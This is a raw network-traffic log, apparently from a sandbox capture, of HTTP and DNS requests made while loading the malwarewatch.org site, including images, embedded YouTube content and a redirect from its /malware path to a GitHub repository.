nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a041a636376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/icons/users.png HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 5007
last-modified: Sun, 21 Feb 2021 17:37:54 GMT
etag: "60329a72-138f"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446927
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hboe7CuiHdNGDv%2F9ZFe2USzTqF1e2gv3ARn%2Fs%2BlgKZ92wVgtbV1Y9eF1WlzKzADWDKJ72%2FO3f9MA6NqZGLALd1iJslJGvmj7%2B7QTaaQJaic%2BpX2ErSiC%2BjoSrX7jm5PVfo3T"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a040a5b6376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/icons/youtube.png HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 1292
last-modified: Sun, 21 Feb 2021 17:04:28 GMT
etag: "6032929c-50c"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 395472
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XltE1VwPLavHDCxq6dJ%2F2Rim1JhVPn%2FNH4O2wv81%2Fn2YjAo5BgdArBpBXCXhM9oh%2Bk5CCtR5bLIJJlaI7QmcBNYp9AXh%2FzGQj%2Ff%2FhEXvJrk7OxbEnmEQYvZPGVdQQ6mQGO2l"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a040a5f6376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/icons/twitter.png HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 4872
last-modified: Sun, 21 Feb 2021 18:30:23 GMT
etag: "6032a6bf-1308"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446927
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F823eCS7dswaaso0u%2BIso4NeLneVNvrto%2Fry0KxMZiuSy7s7cyF4o%2BnipqNsmkP7vM1C6KhIwW5kWkiKwwad6P1lKFuz%2Bp1g0F3tO9pwSGPX1wSErJFGJkjl569MhigUhQWu"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a040a576376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/icons/steam.png HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 4030
last-modified: Sun, 21 Feb 2021 17:11:00 GMT
etag: "60329424-fbe"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446927
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWAJBi11yK4qhTEXHTyc28wkT9p1LV%2FP3PuY6ujoZdR07xRy9HpnmMhoKVeZp5Crt%2FP5yoUdrOcqAt5rWUxX9MEg2LfFp4jScw649%2FI%2BY5OFqmY0PySCv2ygYZbyoaw%2Fhl3e"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a040a5c6376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/backgrounds/background.jpg HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/styles/styles.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/jpeg
content-length: 163022
last-modified: Sun, 17 Apr 2022 11:51:13 GMT
etag: "625bff31-27cce"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446926
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o4ieecvegrEcrTbXnRZbkZk%2FPcU9436RXySH%2BIvKeinBVun6469CW7ZOLqS7WDeCYhvCJZFhNjvMlAAkiMOy%2BYnj7gdnkdDRJHIITBhcoP3jBB8VvdHcHKWngkURhPP0kJt1"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a042a756376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/assets/video_feed/peek.png HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/styles/styles.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 19307
last-modified: Sat, 06 Mar 2021 16:18:42 GMT
etag: "6043ab62-4b6b"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446926
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eOq86FS5ceaXSvd%2B1GVkRWw0xu9KQf1%2B%2BgWSjum493hz09UL%2FPfw3W9nErRyElPAIwqiUOBnoAk8lJSuAPnIO%2FPK0FW0uyg2rS2Tust5TG1eOa1RlAEctVmVhvqF4n6NoNvH"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a042a7d6376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /video_list.html HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
last-modified: Mon, 13 May 2024 09:00:01 GMT
cache-control: public, max-age=90, immutable
x-content-type-options: nosniff
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKZEl%2FI6yQw3BnV2BmwgW1SaoPDWHfoAKXsRbCzOB%2FzRVk7c7N58K05FYyfR38algMxVSW6bbSp03P8Iu%2Bf2l2lolJhnLArNd8QFRVvuGUPo3DeMeer6C9s9kibVj3wfmcqw"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 88352a047b126376-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /andrew_video_list.html HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
last-modified: Mon, 13 May 2024 09:00:02 GMT
cache-control: public, max-age=90, immutable
x-content-type-options: nosniff
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NJ%2BELU0RAJotmd3A3oEraZ21ewO3OcVQepCpuEU1fuA4lNHSufiSaozLiA4Xvxa5qFv10ogrxjURLzYos6WyW2Qhl88X3%2FIiu4MBbj7yR8kj%2BLfeL2KFZZfwNCYexOifx7e1"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 88352a047b146376-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/favicon.ico?v=1.1 HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/x-icon
content-length: 85575
last-modified: Sat, 31 Jan 2009 07:07:38 GMT
etag: "4983f8ba-14e47"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4487920
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8dBIiHktfbz789SzmANwlVyTioBl2L5FJzmvoVtUWtn4C8z4KB06bZjA3ylXqSoAlAJKFwivOOGaDbIh%2Br43gNYkVUpeVn6%2F6U2CB2W38eMwb0PMqNm6Pwfyng%2BW49FsYAnH"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a0f883f6376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /malware HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html, application/xhtml+xml
turbolinks-referrer: https://malwarewatch.org/
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 301
content-type: text/html
location: https://github.com/Endermanch/MalwareDatabase
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NvI%2BByJfiQYmMo4JsB%2BOdHpy4WFoywTYtvtx6AfeBnfIjgXQ8L9HOUBZRtfDLVdt9W1gljqyMO8Zwa5LbD5ncEduntCfAjfFYFffTU23iuRfhHz7mCL6M0DRqhMyeE1oxfJ5"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 88352a59ffe96376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /malware HTTP/2.0
host: malwarewatch.org
cache-control: max-age=0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://malwarewatch.org/malware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 301
content-type: text/html
location: https://github.com/Endermanch/MalwareDatabase
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mZIeG4US3VmM3oq5O2YTw6geIy9LKifszmoKNeXE1VhUs7dSL3wmI3a%2Bzfxxfv6J%2Bwz9QVeNkvBS2xXZo1BNXPl%2BxX8iAZaxwIPah0guYieLSyc%2B82Ogm69vBcLXWJtzxuD7"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 88352a5cec7d6376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestunpkg.comIN AResponseunpkg.comIN A104.17.248.203unpkg.comIN A104.17.245.203unpkg.comIN A104.17.247.203unpkg.comIN A104.17.249.203unpkg.comIN A104.17.246.203
-
Remote address:104.17.248.203:443RequestGET /turbolinks@5.2.0/dist/turbolinks.js HTTP/2.0
host: unpkg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=utf-8
access-control-allow-origin: *
content-encoding: br
cache-control: public, max-age=31536000
last-modified: Mon, 20 Aug 2018 15:25:05 GMT
etag: "9677-RSXIDDv/hCTf9IZ4edgduBKMcEo"
via: 1.1 fly.io
fly-request-id: 01HWA1N15MNZ6BKZ9B2N8PGTP6-lhr
cf-cache-status: HIT
age: 1600452
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
server: cloudflare
cf-ray: 88352a02281d7201-LHR
-
Remote address:8.8.8.8:53Requestuse.fontawesome.comIN AResponseuse.fontawesome.comIN CNAMEuse.fontawesome.com.cdn.cloudflare.netuse.fontawesome.com.cdn.cloudflare.netIN A172.67.142.245use.fontawesome.com.cdn.cloudflare.netIN A104.21.27.152
-
Remote address:172.67.142.245:443RequestGET /releases/v5.15.2/css/all.css HTTP/2.0
host: use.fontawesome.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
cache-control: max-age=31556926
etag: W/"c4af24ce595437830af0a401897698b2"
last-modified: Fri, 22 Sep 2023 01:45:20 GMT
vary: Accept-Encoding
cf-cache-status: HIT
age: 1808692
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MXjy4zI%2FYb5zXdRqgf3ulUnbesPUe03X%2FX6YJwM%2FqOn1TPaHhSGNf4t5R4uwDLf%2FCGvK5dxt3X2JaACQ6pp7zhFioLGa%2BjyRLPl7r6YjZF0RQp84RY6ERb3UvcXIrYN6J7Wh5Dty"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 88352a03997f63be-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request176.46.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request183.142.211.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request72.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request71.121.18.2.in-addr.arpaIN PTRResponse71.121.18.2.in-addr.arpaIN PTRa2-18-121-71deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request203.248.17.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request245.142.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request170.201.250.142.in-addr.arpaIN PTRResponse170.201.250.142.in-addr.arpaIN PTRpar21s23-in-f101e100net
-
Remote address:8.8.8.8:53Requestwww.youtube.comIN AResponsewww.youtube.comIN CNAMEyoutube-ui.l.google.comyoutube-ui.l.google.comIN A142.250.179.78youtube-ui.l.google.comIN A142.250.179.110youtube-ui.l.google.comIN A142.250.178.142youtube-ui.l.google.comIN A142.250.201.174youtube-ui.l.google.comIN A172.217.18.206youtube-ui.l.google.comIN A142.250.74.238youtube-ui.l.google.comIN A142.250.75.238youtube-ui.l.google.comIN A216.58.214.174youtube-ui.l.google.comIN A172.217.20.174youtube-ui.l.google.comIN A172.217.20.206youtube-ui.l.google.comIN A216.58.215.46youtube-ui.l.google.comIN A216.58.213.78
-
Remote address:8.8.8.8:53Requestcollector.github.comIN AResponsecollector.github.comIN CNAMEglb-db52c2cf8be544.github.comglb-db52c2cf8be544.github.comIN A140.82.113.22
-
Remote address:142.250.179.78:443RequestGET /embed/TUzn_Qo3B3Y HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.179.78:443RequestGET /s/player/a960a0cb/www-player.css HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/embed/TUzn_Qo3B3Y
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requesti.ytimg.comIN AResponsei.ytimg.comIN A142.250.179.86i.ytimg.comIN A142.250.179.118i.ytimg.comIN A142.250.178.150i.ytimg.comIN A142.250.201.182i.ytimg.comIN A142.250.74.246i.ytimg.comIN A142.250.75.246i.ytimg.comIN A216.58.214.182i.ytimg.comIN A172.217.20.182i.ytimg.comIN A172.217.20.214
-
Remote address:142.250.179.86:443RequestGET /vi/Ia1dvQz-tU4/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.179.86:443RequestGET /vi/tUMow68hha0/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.179.86:443RequestGET /vi/asvb0jFI01A/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.179.86:443RequestGET /vi/A9W6LFKNCLU/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.179.86:443RequestGET /vi/tKtmzLpZ3RQ/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.179.86:443RequestGET /vi/_7UjgXM3lFs/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request163.20.217.172.in-addr.arpaIN PTRResponse163.20.217.172.in-addr.arpaIN PTRpar10s49-in-f31e100net163.20.217.172.in-addr.arpaIN PTRwaw02s07-in-f163�H163.20.217.172.in-addr.arpaIN PTRwaw02s07-in-f3�H
-
Remote address:8.8.8.8:53Request78.179.250.142.in-addr.arpaIN PTRResponse78.179.250.142.in-addr.arpaIN PTRpar21s19-in-f141e100net
-
Remote address:8.8.8.8:53Request86.179.250.142.in-addr.arpaIN PTRResponse86.179.250.142.in-addr.arpaIN PTRpar21s19-in-f221e100net
-
Remote address:8.8.8.8:53Requestgoogleads.g.doubleclick.netIN AResponsegoogleads.g.doubleclick.netIN A172.217.20.194
-
Remote address:172.217.20.194:443RequestGET /pagead/id HTTP/2.0
host: googleads.g.doubleclick.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.youtube.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requeststatic.doubleclick.netIN AResponsestatic.doubleclick.netIN A172.217.20.198
-
Remote address:8.8.8.8:53Requestjnn-pa.googleapis.comIN AResponsejnn-pa.googleapis.comIN A216.58.214.170jnn-pa.googleapis.comIN A172.217.20.170jnn-pa.googleapis.comIN A172.217.20.202jnn-pa.googleapis.comIN A216.58.215.42jnn-pa.googleapis.comIN A216.58.213.74jnn-pa.googleapis.comIN A142.250.179.74jnn-pa.googleapis.comIN A142.250.179.106jnn-pa.googleapis.comIN A142.250.178.138jnn-pa.googleapis.comIN A142.250.201.170jnn-pa.googleapis.comIN A142.250.74.234jnn-pa.googleapis.comIN A142.250.75.234
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A142.250.178.132
-
